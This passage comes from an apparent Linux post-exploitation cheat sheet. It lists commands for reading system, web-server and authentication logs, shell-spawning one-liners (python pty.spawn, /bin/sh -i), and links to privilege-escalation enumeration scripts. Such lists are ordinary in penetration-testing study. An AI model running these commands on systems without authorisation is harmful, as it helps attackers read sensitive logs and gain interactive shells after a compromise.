  • 10. Finding error messages/requests in the logs cat /etc/httpd/logs/access_log cat /etc/httpd/logs/access.log cat /etc/httpd/logs/error_log cat /etc/httpd/logs/error.log cat /var/log/apache2/access_log cat /var/log/apache2/access.log cat /var/log/apache2/error_log cat /var/log/apache2/error.log cat /var/log/apache/access_log cat /var/log/apache/access.log cat /var/log/auth.log cat /var/log/chttp.log cat /var/log/cups/error_log cat /var/log/dpkg.log cat /var/log/faillog cat /var/log/httpd/access_log cat /var/log/httpd/access.log cat /var/log/httpd/error_log cat /var/log/httpd/error.log cat /var/log/lastlog cat /var/log/lighttpd/access.log cat /var/log/lighttpd/error.log cat /var/log/lighttpd/lighttpd.access.log cat /var/log/lighttpd/lighttpd.error.log cat /var/log/messages cat /var/log/secure cat /var/log/syslog cat /var/log/wtmp cat /var/log/xferlog cat /var/log/yum.log cat /var/run/utmp cat /var/webmin/miniserv.log cat /var/www/logs/access_log cat /var/www/logs/access.log ls -alh /var/lib/dhcp3/ ls -alh /var/log/postgresql/ ls -alh /var/log/proftpd/ ls -alh /var/log/samba/
  • 11. Spawning shells python -c 'import pty;pty.spawn("/bin/bash")' echo os.system('/bin/bash') /bin/sh -i Useful Enumeration scripts https://github.com/rebootuser/LinEnum http://pentestmonkey.net/tools/audit/unix-privesc-check https://github.com/reider-roque/linpostexp/blob/master/linprivchecker.py References: https://blog.g0tmi1k.com https://chryzsh.gitbooks.io/pentestbook https://www.thegeekstuff.com/2011/08/linux-var-log-files https://stackoverflow.com/questions/34032651/searching-an-entire-drive-for-plaintext- passwords